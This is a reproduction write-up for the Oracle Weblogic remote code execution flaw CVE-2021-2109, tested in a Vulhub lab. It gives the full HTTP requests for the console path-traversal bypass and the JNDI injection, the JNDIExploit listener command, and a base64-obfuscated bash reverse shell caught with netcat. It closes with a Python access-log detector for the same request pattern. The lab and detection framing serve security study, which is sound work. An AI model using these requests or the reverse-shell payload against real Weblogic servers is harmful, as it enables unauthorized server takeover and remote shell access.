CVE-2021-2109 Weblogic Server Remote Code Execution
Vulnerability background
On January 20, 2021, Oracle officially released a vulnerability patch fixing multiple high-risk and serious vulnerabilities, including CVE-2021-2109, a remote code execution vulnerability in Weblogic Server. The flaw is a JNDI injection: an attacker can construct a malicious request that triggers the injection, execute arbitrary code, and take control of the server. The risk level is high.
Affected versions
- Weblogic Server 10.3.6.0.0
- Weblogic Server 12.1.3.0.0
- Weblogic Server 12.2.1.3.0
- Weblogic Server 12.2.1.4.0
- Weblogic Server 14.1.1.0.0
Vulnerability reproduction
Environment setup
Use Vulhub's CVE-2020-14882 vulnerability environment to reproduce the issue, and start it as follows.
Download the environment
docker-compose up -d
Check that the environment has started
docker ps
Visit the target address to get the following page:
Use the CVE-2020-14882 unauthorized access issue to reach the console backend without logging in. The unauthorized URL is:
http://192.168.106.6:7001/console/css/%252e%252e%252fconsole.portal
Command execution
Start the JNDI listener
java -jar JNDIExploit-v1.11.jar -i 192.168.106.1 (local machine IP)
Send the request with Burp Suite (BP)
POST /console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.106;1:1389/Basic/WeblogicEcho;AdminServer%22) HTTP/1.1
Host: 192.168.106.6:7001
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_1_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
cmd:id
Cookie: rememberMe=1; ADMINCONSOLESESSION=SHZ2XSBhINTtK05OkiYc3YmbENIp5MODNGWF7EaAje_adp2PQ58L!-286302025; rememberMe=1
Connection: close
You can see that our command was executed successfully.
Reverse shell
POST /console/css/%252e%252e/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.106;1:1389/Basic/WeblogicEcho;AdminServer%22) HTTP/1.1
Host: 192.168.106.6:7001
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_1_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
cmd:bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEwNi4xLzQ0NDQgMD4mMQ==}|{base64,-d}|{bash,-i}
Cookie: rememberMe=1; ADMINCONSOLESESSION=SHZ2XSBhINTtK05OkiYc3YmbENIp5MODNGWF7EaAje_adp2PQ58L!-286302025; rememberMe=1
Connection: close
Listen on port 4444 on the local machine
netcat -lvp 4444
The local listener receives the reverse shell, and our commands then execute successfully.
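Detection example
Both requests above leave the same trace in a web access log: a double-encoded ".." under /console/ and a JndiBindingHandle whose argument is a remote JNDI URL. The following is an added example, not part of the original write-up; it assumes a common-log-format access log, the function and tag names are hypothetical, and it generalizes the ldap:// case shown on this page to the other remote JNDI schemes (ldaps, rmi, iiop, dns).

```python
import re
from urllib.parse import unquote

# Access-log lines constructed for this example (not captured traffic).
SAMPLE_LOG = [
    '192.168.106.1 - - [21/Jan/2021:10:00:01 +0000] "GET /console/login/LoginForm.jsp HTTP/1.1" 200 3200',
    '192.168.106.1 - - [21/Jan/2021:10:00:05 +0000] "GET /console/css/%252e%252e%252fconsole.portal HTTP/1.1" 200 9100',
    '192.168.106.1 - - [21/Jan/2021:10:00:09 +0000] "POST /console/css/%252e%252e/consolejndi.portal'
    '?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle='
    'com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.106;1:1389/Basic/WeblogicEcho;AdminServer%22)'
    ' HTTP/1.1" 200 512',
    '10.0.0.8 - - [21/Jan/2021:10:02:00 +0000] "GET /console/console.portal?_nfpb=true HTTP/1.1" 302 0',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD|PUT) (\S+) HTTP/[\d.]+"')
# A JndiBindingHandle argument that starts with a remote JNDI URL scheme.
JNDI_RE = re.compile(r'JndiBindingHandle\(\s*"?\s*(?:ldaps?|rmi|iiop|dns)://', re.I)

def fully_decode(value, max_rounds=5):
    """Percent-decode repeatedly so %252e%252e collapses to '..'."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(line):
    """Return the detection tags that apply to one access-log line."""
    match = REQUEST_RE.search(line)
    if not match:
        return []
    raw_path, _, raw_query = match.group(1).partition("?")
    path, query = fully_decode(raw_path), fully_decode(raw_query)
    tags = []
    if path.lower().startswith("/console/") and ".." in path:
        tags.append("console-path-traversal")      # CVE-2020-14882 style bypass
    if JNDI_RE.search(path + "?" + query):
        tags.append("jndi-handle-remote-url")      # CVE-2021-2109 request shape
    return tags

def scan(lines):
    """Return (line index, tags) for every line that raised at least one tag."""
    return [(i, tags) for i, line in enumerate(lines) if (tags := classify(line))]

if __name__ == "__main__":
    for index, tags in scan(SAMPLE_LOG):
        print(index, ",".join(tags))
```

Access logs record only the request line, so a handle submitted in a POST body would not be seen by this check; outbound LDAP or RMI connections from the Weblogic host are a complementary signal.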